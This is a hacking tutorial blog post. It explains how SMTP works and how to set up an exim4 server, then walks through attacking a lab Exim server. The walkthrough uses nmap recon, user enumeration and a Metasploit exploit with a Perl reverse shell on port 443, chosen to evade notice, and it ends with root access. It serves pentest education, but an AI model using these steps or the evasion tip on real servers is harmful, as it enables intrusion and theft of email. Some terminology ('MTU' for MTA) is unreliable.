Welcome back, my aspiring cyberwarriors!
In this series, Network Basics for Hackers, we explore the structure, operation and vulnerabilities of the major network protocols. In this way, the aspiring hacker/pentester/cyberwarrior will hopefully gain insight into not only it’s operation but also its vulnerabilities.
In this segment of this series, we will examine the Simple Mail Transport Protocol (SMTP), the protocol most of us could not live without!
What is SMTP?
Simple Mail Transport protocol or SMTP as it is commonly known is among the most important protocols in our digital age. It is used to transfer email from one user to another. Although SMTP was first codified in 1983, it is still this same protocol that carries nearly all emails with some enhancements.
As the diagram above displays, the client Ana@maildomain-abc.com sends an email to the MTU server via SMTP and retrieves email via either POP3 or IMAP. The same is true for the other client, Lav@maildomain-xyz.com. Communication between the email servers or MTU’s is exclusively SMTP on port 25. POP3 uses port 110 and IMAP uses port 143.
The Email Processing Model
First, email is submitted by a email client or mail user agent (MUA) such as Microsoft Outlook, Mozilla, etc. to the email server (mail server agent or MSA) using SMTP on port 587. This email is then transferred to the MTU. Most often, these two agents (MUA and MTU) are the same system managed by a single piece of software.
The boundary MTA uses DNS to look up the MX record of the recipient’s domain (see DNS). This record includes the name of the target MTA. We can demonstrate this with the dig command.
The MTA then selects the target host, connects to it and sends the message.
Once the server receives the incoming message, it hands it to a mail delivery agent (MDA) for delivery to local recipient. Once the message is delivered to the local mail server, the email is stored for retrieval by an authenticated MUA.
Types of MTU’s
There are multiple mail transfer units used on various systems. In Linux, the major players are sendmail, EXIM, and postfix. On Microsoft operating system, the major player is Microsoft’s Exchange Server
Packet-Level Analysis with Wireshark
When we capture packets going to a SMTP server, it looks something like that below.
Note that in packets 1-3, an outside client is completing a TCP three-way handshake. In packet 4, the SMTP server identifies itself as “mail01” and a Postfix server on Ubuntu and begins using the SMTP protocol for communication. In packet 5, the client issues the EHLO command initiating communication. In packet 8, the client identifies the email sender and in packet 10, the email receiver.
Setting Up an SMTP (EXIM4) Server in Linux
Let’s now setup a SMTP server in our Kali Linux. In this case, we’ll install exim4, the most widely used email server on Linux systems.
We can download exim4 from the Kali repository.
kali > sudo apt install exim4
Next, we need to execute a configuration wizard that walks us through the configuration of the exim4 server.
kali > sudo dpkg-reconfigure exim4-config
This starts a configuration wizard that queries us for information to configure the email server.
The first question is the type of mail server. If you want to setup your server to send and receive email across the Internet, select the first choice.
Next, you need to provide a domain name that you own. In my case, I used www.hackers-arise.com.
Here, we need to provide a list of recipient domains or local domains. The default is Kali and I left that in place.
Next, we are queried regarding the DNS queries. If we want to minimize the DNS lookups select YES.
Next, select the domains to relay mail for. You can leave it blank.
Finally, we need to select whether to split the configuration file for the exim4. Unsplit is more stable while split makes it easier to make changes. I selected unsplit or NO.
Now, we only need to start our exim4 server and our email server is activated and ready to send and receive email!
Vulnerabilities in SMTP
Last year has been marked by a major vulnerability found in Microsoft Exchange Server, presumably by Chinese hackers. These vulnerabilities enabled these hackers to access many large corporations and institutions email records. The impact of this hack was so large and serious that the FBI was given authorization to patch Exchange Server systems throughout the US.
You can see the vulnerabilities below.
In addition, in 2020, exim email servers had two severe vulnerabilities that allowed unauthorized access of email stored on these servers.
Recon and Hacking SMTP
Before attempting any exploit, the first step is to do proper reconnaissance. nmap is the tool of choice for port scanning. let’s scan our SMTP service to see what ports and services are running.
We can do a TCP scan on port 25 (the default SMTP port) with nmap and include the -A switch to attempt to determine the service running on that port, such as;
kali > nmap -sT -A 192.168.56.103 -p25
As you can see above, nmap found port 25 open and running Exim 4.68.
The determine any potential vulnerabilities on that SMTP server, we might use nmap scripts. To run all the nmap scripts for SMTP, we can use the –script=smtp-* option where the wildcard (*) means run all the scripts in the smtp category.
nmap –script=smtp-* 192.168.56.103 -p 25
As you can see above, the smtp nmap scripts were able to enumerate multiple users (these users can then be targeted with social engineering attacks) and find that the server is vulnerable to the cve-2010-4344 and CVE-2010-4345 exploits.
Next, let’s see whether we can find these exploits in Metasploit. Fire up Metasploit by entering;
kali > msfconsole
Now, let’s search for Exam exploits by using the search function.
msf5 > search type:exploits exim
As you can see in the screenshot above, Metasploit has multiple Exim exploits. Let’s try the exploit/unix/smtp/exim4_string_format exploit.
First , let load the exploit using the use command.
msf5> use exploit/unix/smtp/exim4_string_format
Before we progress further, let’s learn more about this exploit by entering ïnfo”.
kali > info
As you can above, this module exploits a heap buffer overflow. In addition, if it detects a Perl interpreter, it will automatically escalate privileges from a regular user to root.
Then, let’s set the RHOSTS parameter with the target system’s IP address. With the RHOSTS set, next set the PAYLOAD. In this case, let’s use cmd/unix/reverse_perl. This payload will open a command shell on the target machine using Perl (most Unix like systems have Perl installed by default) that will call back to our attack system if successful.
Lastly, we need only to set the LHOST and the LPORT. Let’s set the LPORT 443 so that it uses commonly open port for HTTPS traffic. Often, by using this port, this exfiltration will go unnoticed.
The only step left is to run exploit
msf5> exploit
As you can see above, the exploit worked and gave us a command shell in session 1!
Unlike when we exploit a Windows system, when we grab a command shell on Linux systems, we do not get a command prompt but rather an empty line. To test whether we are actually on the Linux SMTP server, we can enter Linux commands and check for the response. In this case, let’s run a few common Linux commands such as id, whoami, pwd, uname -a.
As you can see above, the system responding by informing us that user is uid=0 or root, the present working directory is /var/spool/exim4 and the uname is Linux mailserver01.
Summary
Email service or Simple Mail Transport Protocol (SMTP) is one of the most critical services in our digital age. It is also one of the most highly targeted services as it contains confidential and key information. It is critical that this service be properly configured to prevent unauthorized access to this crucial data source.